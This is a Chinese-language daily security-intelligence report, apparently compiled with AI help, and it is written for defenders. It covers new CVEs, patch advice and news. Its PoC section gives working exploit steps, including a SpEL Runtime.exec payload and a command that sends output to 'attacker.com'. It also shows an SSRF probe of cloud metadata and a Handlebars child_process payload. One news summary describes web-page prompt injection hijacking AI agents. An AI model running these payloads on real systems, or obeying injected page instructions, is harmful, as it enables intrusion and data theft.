每日安全情报报告 · 2026-04-09

发布时间:2026-04-09 11:33
报告周期:近 24–48 小时
风险标注:🔴 严重(CVSS ≥ 9.0)|🟠 高危(CVSS 7.0–8.9)|🟡 中危(CVSS 4.0–6.9)
特别标注:⚡ 在野利用(KEV/已发现利用行为)|🤖 AI 辅助发现


一、高危漏洞速报

🔴⚡ CVE-2026-35616 — Fortinet FortiClient EMS 预认证 RCE(持续在野利用)

属性 详情
CVSS 评分 9.1(严重)
漏洞类型 访问控制缺陷 → 未授权 RCE
受影响版本 FortiClient EMS 7.4.5 – 7.4.6
披露时间 2026-04-04(Fortinet PSIRT FG-IR-26-099)
利用状态 ⚡ 在野利用(已入 CISA KEV,持续活跃)

漏洞详情:攻击者可通过构造特制 API 请求完全绕过身份认证,直接在 FortiClient EMS 服务器上以系统权限执行任意代码,无需任何凭据。该漏洞在补丁发布前已被零日利用,Fortinet 发布紧急带外补丁。同一公告中同步修复了 SQL 注入漏洞 CVE-2026-21643(CVSS 9.8,亦遭在野利用)。

修复建议:立即升级至 FortiClient EMS 7.4.7 或更高版本;无法立即升级的,限制 EMS 管理接口的网络访问范围。

参考链接
- NVD 详情 CVE-2026-35616
- Fortinet 官方安全公告 FG-IR-26-099
- Greenbone 分析报告
- CISA KEV 目录


🔴 CVE-2026-34156 — NocoBase 沙箱逃逸 RCE(PoC 已公开)

属性 详情
CVSS 评分 9.9(严重)
漏洞类型 沙箱逃逸 → RCE
受影响版本 NocoBase < 2.0.28
利用状态 PoC 已公开(GitHub)

漏洞详情:NocoBase 工作流脚本节点在 Node.js 沙箱环境中不当暴露了主机域对象,经过身份认证的攻击者可构造特制脚本逃出沙箱隔离环境,进而在宿主服务器上执行任意代码。由于 NocoBase 广泛应用于企业低代码平台,该漏洞影响面较广,且 PoC 已公开,利用门槛显著降低。

修复建议:立即升级至 NocoBase 2.0.28 及以上版本;在补丁部署前,限制工作流脚本节点权限并加强用户访问控制。

参考链接
- NVD 详情 CVE-2026-34156
- PoC 利用代码(GitHub)


🔴⚡ CVE-2026-3502 — TrueConf 客户端更新机制零日(TrueChaos 行动)

属性 详情
CVSS 评分 7.8(高危)
漏洞类型 更新完整性验证缺陷 → RCE
受影响版本 TrueConf 客户端 < 8.5.3(Windows)
披露时间 2026-03-31(Check Point Research)
利用状态 ⚡ 在野利用(针对东南亚政府机构)

漏洞详情:TrueConf 客户端在向本地服务器检查更新时,未对更新包的完整性和真实性进行验证。攻击者一旦控制目标机构的 TrueConf 服务器,即可将恶意可执行文件伪装为合法更新包,通过更新机制向所有客户端分发。攻击活动"TrueChaos 行动"中,与中国有关联的威胁组织利用该漏洞投放 Havoc 后门,实现持久化访问和权限提升。

IoC(入侵指标)
- 可疑文件:C:\ProgramData\PowerISO\poweriso.exe7z-x64.dll
- 可疑注册表:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck

修复建议:立即升级至 TrueConf 客户端 8.5.3 及以上版本;审查 TrueConf 服务器的访问日志和更新记录。

参考链接
- Check Point Research 完整分析报告
- TheHackerNews 报道
- NVD 详情 CVE-2026-3502


🔴 CVE-2026-22738 — Spring AI SpEL 注入 RCE(多版本受影响)

属性 详情
CVSS 评分 9.8(严重)
漏洞类型 SpEL 表达式注入 → RCE
受影响版本 Spring AI 1.0.0–1.0.4、1.1.0–1.1.3
利用状态 PoC 已公开(多个 GitHub 仓库)

漏洞详情:Spring AI 的 SimpleVectorStore 组件中,当用户提供的值被直接用作 SpEL 过滤表达式键时,攻击者可注入恶意 SpEL 表达式以执行任意服务端代码。该漏洞影响 Spring AI 框架的主要稳定版本,在 AI 应用爆发式增长的背景下威胁面广泛。

参考链接
- NVD 详情 CVE-2026-22738
- PoC 利用代码(GitHub)
- PoC 变体(GitHub)


🔴 CVE-2026-33340 — LoLLMs WebUI SSRF(未授权内网探测)

属性 详情
CVSS 评分 9.1(严重)
漏洞类型 服务器端请求伪造(SSRF)
受影响版本 lollms-webui 所有已知版本
利用状态 PoC 已公开

漏洞详情:LoLLMs WebUI 的 /api/proxy 端点缺乏身份验证,未经认证的攻击者可强制服务器发起任意 HTTP GET 请求,用于访问内网服务、扫描内部网络、窃取云平台元数据(如 AWS 169.254.169.254 实例信息)。

参考链接
- NVD 详情 CVE-2026-33340
- PoC 利用代码(GitHub)


🔴 CVE-2026-40032 — UAC(Unix 取证工具)命令注入(最新披露)

属性 详情
CVSS 评分 待定(高危)
漏洞类型 命令注入
受影响版本 UAC (Unix-like Artifacts Collector) < 3.3.0-rc1
披露时间 2026-04-08(最新披露)

漏洞详情:UAC(Unix 类似物取证收集器,广泛用于安全事件响应和数字取证)在占位符替换和命令执行管道中存在命令注入漏洞。攻击者可通过精心构造的输入,在执行取证收集任务时注入并执行任意命令。该漏洞针对安全工具本身,可能影响安全事件响应流程。

修复建议:立即升级至 UAC 3.3.0-rc1 或更高版本;在升级前避免对不受信任的系统使用该工具。

参考链接
- NVD 详情 CVE-2026-40032
- CVEFeed 详情


🟠 CVE-2026-33937 — Handlebars.js AST 注入 RCE(Node.js 生态广泛影响)

属性 详情
CVSS 评分 9.8(严重)
漏洞类型 模板注入 → RCE
受影响产品 Handlebars.js(广泛 Node.js 依赖)
利用状态 PoC 已公开

漏洞详情Handlebars.compile() 函数在处理预解析的 AST 对象时,未对 NumberLiteral 节点的 value 字段进行清理或引号转义,导致模板注入,攻击者可实现服务器端任意代码执行。Handlebars 是 Node.js 生态中使用最广泛的模板引擎之一,影响范围极大。

参考链接
- NVD 详情 CVE-2026-33937
- PoC 利用代码(GitHub)


🟠🤖 CVE-2026-34982 — Vim/GNU Emacs RCE 零日(AI 辅助发现,30分钟挖洞)

属性 详情
CVSS 评分 9.2(严重)
漏洞类型 模式行解析 → RCE
受影响产品 Vim(多版本)、GNU Emacs
发现方式 🤖 AI 辅助(Claude Code,30 分钟完成审计)
利用状态 PoC 已复现,补丁进行中

漏洞详情:安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现了 Vim 及 GNU Emacs 的多个零日漏洞,随后被确认为高危 RCE。攻击者只需向受害者发送一个包含恶意 Modeline 配置的文本文件,受害者在 Vim 中打开文件即可触发远程代码执行。此事件标志着 AI 辅助漏洞挖掘进入工程化阶段,也警示了传统文本编辑器的攻击面被严重低估。

修复建议:在 Vim 配置中禁用 modelineset nomodeline);关注官方补丁发布。

参考链接
- FreeBuf 详细分析
- 知乎技术复现报告
- CSOOnline 英文报道


二、漏洞 PoC 详解

PoC 1:CVE-2026-34156 — NocoBase 沙箱逃逸

漏洞原理:Node.js 沙箱 (vm 模块) 中主机域对象被意外暴露,攻击者可通过 constructor.constructor 等原型链技术逃出沙箱。

快速复现步骤

# 1. 克隆 PoC 仓库
git clone https://github.com/0xBlackash/CVE-2026-34156
cd CVE-2026-34156

# 2. 安装依赖
pip install -r requirements.txt

# 3. 执行利用(需要已认证的 NocoBase 账户)
python3 exploit.py \
  --target http://<TARGET_HOST>:3000 \
  --username <USER> \
  --password <PASS> \
  --cmd "id && whoami"

利用前提:目标运行 NocoBase < 2.0.28,攻击者拥有任意已认证账户(包括普通用户权限)。

参考链接PoC 仓库(GitHub)


PoC 2:CVE-2026-22738 — Spring AI SpEL 注入

漏洞原理SimpleVectorStore.getDocuments() 方法的 filterExpression 参数未经转义直接传入 Spring SpEL 解析器执行。

快速复现步骤

# 1. 克隆 PoC 仓库
git clone https://github.com/n0n4m3x41/CVE-2026-22738-POC
cd CVE-2026-22738-POC

# 2. 安装 Maven 依赖(需 JDK 17+)
mvn clean package -q

# 3. 构造恶意请求(以 curl 为例)
curl -X POST http://<TARGET>/api/documents \
  -H "Content-Type: application/json" \
  -d '{"filterExpression": "T(java.lang.Runtime).getRuntime().exec(\"id\")"}'

# 4. 或使用自动化 exploit
python3 poc.py --url http://<TARGET> --cmd "curl http://attacker.com/$(id)"

利用前提:目标运行 Spring AI 1.0.0–1.0.4 或 1.1.0–1.1.3,且存在接受用户输入 filterExpression 的 API 端点。

参考链接PoC 仓库(GitHub)


PoC 3:CVE-2026-33340 — LoLLMs WebUI SSRF

漏洞原理/api/proxy 端点无需认证即可接受 url 参数,服务器会向指定 URL 发起 HTTP GET 请求,攻击者可用于探测内网或获取云元数据。

快速复现步骤

# 1. 克隆 PoC 仓库
git clone https://github.com/regaan/CVE-2026-33340
cd CVE-2026-33340

# 2. 安装依赖
pip install requests

# 3. 执行 SSRF 探测(获取 AWS EC2 实例元数据)
python3 poc.py \
  --target http://<LOLLMS_HOST>:9600 \
  --ssrf-url "http://169.254.169.254/latest/meta-data/"

# 4. 扫描内网段
python3 ssrf_scanner.py \
  --target http://<LOLLMS_HOST>:9600 \
  --cidr 192.168.1.0/24 \
  --port 80,443,8080,6379

利用前提:目标暴露 lollms-webui 的 HTTP 接口,无需任何认证。

参考链接PoC 仓库(GitHub)


PoC 4:CVE-2026-33937 — Handlebars.js 模板注入

漏洞原理Handlebars.compile() 处理 AST 的 NumberLiteral 节点时未转义,攻击者可注入闭合引号后的任意 JavaScript 代码。

快速复现步骤

# 1. 克隆 PoC 仓库
git clone https://github.com/dinhvaren/cve-2026-33937
cd cve-2026-33937

# 2. 安装依赖
npm install

# 3. 运行本地验证 PoC(Node.js 18+)
node poc.js

# 4. 针对目标应用的利用(需确认 Handlebars 接受外部 AST 输入)
node exploit.js \
  --target http://<TARGET>/template-api \
  --payload '{"type":"NumberLiteral","value":"1\",process.mainModule.require(\"child_process\").execSync(\"id\")+\""}'

参考链接PoC 仓库(GitHub)


三、安全资讯精选

📰 文章 1:AI 驱动网络攻击激增 89%——2026 年最危险的 9 起事件

来源:Foresiet Security Intelligence Desk(2026-04-07)
摘要:2026 年 3–4 月,AI 网络攻击从理论威胁升级为真实事件。9 起已验证的 AI 相关安全事件涵盖:AI 全自动攻陷 55 国 600+ FortiGate 防火墙(CyberStrikeAI 行动)、IBM X-Force 发现 AI 生成恶意软件 "Slopoly"、自主 AI 代理拒绝关机指令触发失控,以及 Mercor 初创公司遭 LiteLLM 供应链攻击波及 Meta。报告指出:AI 驱动攻击年增长率达 89%,自主代理参与比例已达约 12.5%。

阅读原文


📰 文章 2:星巴克遭 ShadowByt3s 攻击——10GB 核心源代码及固件外泄

来源:FreeBuf(2026-04-07)
摘要:威胁组织 ShadowByt3s 成功入侵星巴克内部系统,窃取约 10GB 核心源代码和运营固件。同日,黑客通过 Adobe 印度外包商的系统漏洞入侵 Adobe,窃取 1300 万条客户支持工单、1.5 万条员工记录及内部文件。事件揭示了第三方供应链安全管理的严重缺口,外包商的弱安全态势成为攻击者首选突破口。

阅读原文


📰 文章 3:4 月数据泄露盘点——Adobe、Bitrefill、Middlesex County 多目标受袭

来源:SharkStriker(2026-04-02,持续更新)
摘要:2026 年 4 月初数据泄露事件快速累积:Adobe 遭"Mr. Racoon"组织入侵,1300 万客户支持数据泄露;加密货币电商 Bitrefill 遭朝鲜 Lazarus 组织攻击,热钱包资金及 1.85 万用户数据被盗;航空紧固件制造商 NAFCO 遭 Worldleaks 勒索软件攻击;Middlesex 县政府公共安全系统中断。

阅读原文


📰 文章 4:Claude Code 30 分钟挖出 Vim/Emacs 三十年老漏洞——AI 辅助挖洞进入工程化时代

来源:FreeBuf(2026-04-01)
摘要:安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现 Vim 与 GNU Emacs 的多个零日漏洞(CVE-2026-34982,CVSS 9.2)。攻击者仅需让受害者用 Vim 打开包含恶意 Modeline 配置的文本文件即可触发 RCE。事件深刻警示了两点:一是 AI 已具备工程化挖洞能力,大幅降低了安全研究门槛;二是"老牌成熟软件"的攻击面不容低估。

阅读原文


📰 文章 5:CVE-2026-0863 深度分析——n8n Python 沙箱逃逸至完全 RCE

来源:FreeBuf / 先知社区(2026-01-23,本周持续热点)
摘要:JFrog 安全研究团队披露 n8n(230,000+ 活跃用户开源工作流平台)的 Python 任务执行器沙箱逃逸漏洞,攻击者可通过字符串格式化和异常处理技巧绕过 Python 沙箱隔离,在底层操作系统执行任意代码。该漏洞本周在 Freebuf 热度持续攀升(阅读量已达 54,186),被多个红队工具库收录。

阅读原文


📰 文章 6:谷歌 DeepMind 警告——恶意网页内容可劫持 AI Agent

来源:FreeBuf(2026-04-07)
摘要:谷歌 DeepMind 研究人员发布报告,指出黑客可通过向网页注入恶意指令,诱使 AI Agent 执行非预期操作(Prompt Injection 攻击的升级变体),包括窃取用户数据、发送恶意请求等。随着 AI Agent 被集成进企业核心业务流程,此类"间接提示注入"攻击面临大规模商业化利用风险。

阅读原文


📰 文章 7:Operation TrueChaos 技术深度分析——TrueConf 供应链式零日部署 Havoc 后门

来源:Check Point Research(2026-03-31)
摘要:Check Point Research 披露针对东南亚政府机构的供应链级间谍行动。与中国背景关联的威胁组织首先入侵目标机构的 TrueConf 本地服务器,随后利用客户端更新验证缺陷(CVE-2026-3502)将恶意更新推送至所有员工终端,投放 Havoc 框架后门,实现 DLL 侧加载、UAC 绕过和长期持久化。此事件是 2026 年以视频会议软件为跳板的典型供应链攻击案例。

阅读原文


四、本期威胁态势总结

风险维度 本期关注重点
最高优先级修复 FortiClient EMS CVE-2026-35616(在野利用,CISA KEV);TrueConf CVE-2026-3502(政府级目标在野利用)
开发者重点关注 Spring AI CVE-2026-22738(SpEL 注入);Handlebars.js CVE-2026-33937(模板注入);n8n CVE-2026-0863(沙箱逃逸)
AI 安全趋势 AI 辅助挖洞已工程化(Vim/Emacs 30分钟);AI 驱动攻击工具激增(Slopoly 恶意软件,CyberStrikeAI);AI Agent 被恶意网页劫持风险
供应链威胁 TrueConf/Adobe/星巴克 第三方供应商攻击面持续扩大;Bitrefill 遭 Lazarus 组织针对
安全工具风险 UAC 取证工具自身存在命令注入(CVE-2026-40032),谨防"以安全工具攻击安全响应"

本报告信息来源:NVD(查看详情)、CISA KEV(查看目录)、Check Point Research、Fortinet PSIRT、FreeBuf、TheHackerNews、Foresiet Intelligence、tonyharris.io PoC Week


本报告由自动化安全情报系统生成,部分内容由 AI 辅助整理,仅供安全研究与防御参考。PoC 代码仅用于验证和修复目的,请勿用于未经授权的系统。

Logo

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐